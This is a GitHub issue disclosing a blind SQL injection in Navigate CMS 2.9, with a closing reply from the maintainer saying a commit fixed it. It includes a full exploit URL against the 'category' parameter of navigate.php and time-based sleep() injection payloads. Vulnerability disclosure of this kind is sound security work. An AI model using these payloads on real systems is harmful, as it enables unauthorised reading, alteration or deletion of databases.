Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Blind SQL Injection Vulnerability Navigate CMS 2.9 #20

Closed
luuthehienhbit opened this issue Jun 19, 2020 · 1 comment
Closed

Blind SQL Injection Vulnerability Navigate CMS 2.9 #20

luuthehienhbit opened this issue Jun 19, 2020 · 1 comment

Comments

@luuthehienhbit
Copy link

Expected behaviour
Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category.
Impact
Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database.
- Executing commands on the underlying operating system.
Steps to reproduce
Inject payload on the category via request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items
Payload: (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
image
Payload: (select(0)from(select(sleep(10)))v)/'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"/
image
Payload: (select(0)from(select(sleep(20)))v)/'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
image

@NavigateCMS
Copy link
Owner

Fixed by d459b1d

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants